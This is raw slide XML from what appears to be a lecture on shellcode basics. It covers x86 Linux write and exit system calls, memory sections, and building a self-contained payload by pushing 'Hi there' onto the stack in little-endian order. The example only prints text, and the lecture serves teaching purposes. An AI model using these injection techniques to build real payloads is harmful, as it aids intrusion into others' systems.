                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" b="1" dirty="0" smtClean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 // exit()</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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8048096:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>b8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>01 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x1,%eax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804809b:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00 00 00 00     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov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$0x0,%ebx</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 80480a0:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>80              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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look like in memory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have a string in the data section</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>We have code in the text section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The code references the data section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0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: Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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80592" y="831095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0592" y="4647519"/>
            <a:ext cx="2808312" cy="1224136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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80592" y="1047119"/>
            <a:ext cx="2808312" cy="941721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575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80592" y="2733917"/>
            <a:ext cx="2808312" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="rnd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70991"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data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4928" y="4630512"/>
            <a:ext cx="590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8048080:  b8 04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$0x4,%eax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8048085:  bb 01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$0x1,%ebx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804808a:  b9 a4 90 04 08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$0x80490a4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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,%ecx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804808f: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09 00 00 00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$0x9,%edx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8048094:  cd 80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0x80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04928" y="4647519"/>
            <a:ext cx="5601072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7751" y="2800399"/>
            <a:ext cx="3523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“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>65</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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8621" y="1510815"/>
            <a:ext cx="221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0x80490a4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304928" y="2754018"/>
            <a:ext cx="3456384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endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7591604" y="3547323"/>
            <a:ext cx="1879739" cy="1339999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17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="7523836" y="2433228"/>
            <a:ext cx="1181863" cy="506587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4088904" y="2754018"/>
            <a:ext cx="216024" cy="242934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4088904" y="3140968"/>
            <a:ext cx="216024" cy="905428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>
            <a:off x="4088904" y="4657865"/>
            <a:ext cx="216024" cy="499327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4088904" y="5445224"/>
            <a:ext cx="216024" cy="505019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1280592" y="2996952"/>
            <a:ext cx="2808312" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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</a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Have the data in the code section!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How do we reference the data?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Push the data onto the stack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reference the data on the stack (for the system call)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4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smtClean="0"/>
              <a:t>Shellcode is:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>code we want to upload to the remote system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Our “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>evil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>“A set of instructions injected and executed by exploited software”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536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: Memory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>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80592" y="831095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0592" y="4647519"/>
            <a:ext cx="2808312" cy="1224136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/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80592" y="1047119"/>
            <a:ext cx="2808312" cy="94172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Stack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280592" y="2733917"/>
            <a:ext cx="2808312" cy="1512168"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="38100" cap="rnd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 Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Data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4928" y="4630512"/>
            <a:ext cx="5009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8048080:  b8 04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$0x4,%eax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8048085:  bb 01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$0x1,%ebx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804808a:  b9 a4 90 04 08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1600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1600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804808f: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09 00 00 00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$0x9,%edx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8048094:  cd 80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0x80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04928" y="4647519"/>
            <a:ext cx="5601072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2960" y="1231073"/>
            <a:ext cx="3523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“Hi there”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0"/>
              <a:t>48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" dirty="0" smtClean="0"/>
              <a:t>65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92960" y="1054911"/>
            <a:ext cx="3456384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endCxn id="17" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="7254466" y="2570344"/>
            <a:ext cx="2922385" cy="1197951"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050"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4088904" y="1054911"/>
            <a:ext cx="504056" cy="789913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4088904" y="1966583"/>
            <a:ext cx="504056" cy="380706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>
            <a:off x="4088904" y="4657865"/>
            <a:ext cx="216024" cy="499327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4088904" y="5445224"/>
            <a:ext cx="216024" cy="505019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1280592" y="1844824"/>
            <a:ext cx="2808312" cy="144016"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F70991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391" y="1060779"/>
            <a:ext cx="1064568" cy="63895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ESP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40" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="803085" y="1439325"/>
            <a:ext cx="217096" cy="737917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1052736"/>
            <a:ext cx="8229600" cy="5244877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Translate to ASCII:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>; H  i  _  t   h  e  r  e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>48 69 20 74 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>72</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>Invert for little endianness:</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>72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FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65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FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> 74 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>20 69 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>48</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="3200" b="1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907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1052736"/>
            <a:ext cx="8229600" cy="5244877"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>H  i  _  t   h  e  r  e</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>; 48 69 20 74 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>72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00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65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92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>72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FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t> 74 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0"/>
              <a:t>20 69 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0"/>
              <a:t>48</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="3200" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="92D050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>72</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>65</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>68</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>push 0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="3200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F70991"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t> 0x80</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1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8805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84648" y="980728"/>
            <a:ext cx="2664296" cy="10153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&lt;Stuff&gt;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8716" y="1996094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0x65726568</a:t>
            </a:r>
          </a:p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0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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de-CH" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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0x80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4770235" y="1987510"/>
            <a:ext cx="672356" cy="28803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622" y="1690767"/>
            <a:ext cx="100700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de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="Elbow Connector 19"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="18" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1158629" y="1983155"/>
            <a:ext cx="649177" cy="4355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84648" y="980728"/>
            <a:ext cx="2664296" cy="10153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&lt;Stuff&gt;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8716" y="1996094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0x65726568</a:t>
            </a:r>
          </a:p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0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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de-CH" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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0x80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808984" y="2495799"/>
            <a:ext cx="672356" cy="28803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84648" y="1996094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</a:rPr>
              <a:t>0x65726568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622" y="1690767"/>
            <a:ext cx="100700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de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Elbow Connector 8"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1158628" y="1996094"/>
            <a:ext cx="698030" cy="633566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712640" y="2629658"/>
            <a:ext cx="144016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84648" y="980728"/>
            <a:ext cx="2664296" cy="10153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&lt;Stuff&gt;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8716" y="1996094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0x65726568</a:t>
            </a:r>
          </a:p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0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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de-CH" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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0x80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736976" y="3068960"/>
            <a:ext cx="672356" cy="28803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84648" y="1996094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</a:rPr>
              <a:t>0x65726568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622" y="1690767"/>
            <a:ext cx="100700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de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Elbow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="730681" y="2199987"/>
            <a:ext cx="978412" cy="1129522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1784648" y="2620390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</a:rPr>
              <a:t>0x74206948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84648" y="980728"/>
            <a:ext cx="2664296" cy="10153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&lt;Stuff&gt;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8716" y="1996094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0x65726568</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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0x74206948</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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r>
              <a:rPr lang="de-CH" sz="3600" b="1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3600" b="1" dirty="0" err="1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de-CH" sz="3600" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="F7099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CH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CH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0x80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736976" y="3573016"/>
            <a:ext cx="672356" cy="288032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84648" y="1996094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</a:rPr>
              <a:t>0x65726568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622" y="1690767"/>
            <a:ext cx="100700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endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Elbow Connector 8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="8" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000" flipH="1">
            <a:off x="730681" y="2199987"/>
            <a:ext cx="978412" cy="1129522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1784648" y="2620390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</a:rPr>
              <a:t>0x74206948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529" y="3882674"/>
            <a:ext cx="97494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ECX</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Elbow Connector 6"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="11" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1" flipV="1">
            <a:off x="888466" y="2986491"/>
            <a:ext cx="628720" cy="1163647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Fix: Stack Reference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50842" y="1381205"/>
            <a:ext cx="2736304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</a:rPr>
              <a:t>0x74206948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87146" y="1378713"/>
            <a:ext cx="2664296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</a:rPr>
              <a:t>0x65726568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51442" y="1378713"/>
            <a:ext cx="2664296" cy="6360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&lt;Stuff&gt;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50842" y="2261823"/>
            <a:ext cx="5400600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48 69 20 74 68 65 72 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH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51442" y="2261823"/>
            <a:ext cx="2664296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&lt;Stuff&gt;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12640" y="5067480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0xAABBCCDD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12640" y="5701044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 CC BB AA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12640" y="4433916"/>
            <a:ext cx="2880320" cy="6335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2864434397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504728" y="5701044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3872880" y="5701044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3224808" y="5701044"/>
            <a:ext cx="0" cy="63356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95857" y="4441468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Decimal (10)</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695857" y="5117486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in Hex (16)</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4695857" y="5732990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Endian Storage</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH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50842" y="2990287"/>
            <a:ext cx="5400600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de-CH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  i  _  t  h  e  r  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951442" y="2990287"/>
            <a:ext cx="2664296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Rounded MT Bold" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;Stuff&gt;</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="de-CH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764704"/>
            <a:ext cx="8229600" cy="5532909"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>08048060 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>&lt;_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t> 8048060:   </a:t>
            </a:r>
            <a:r>
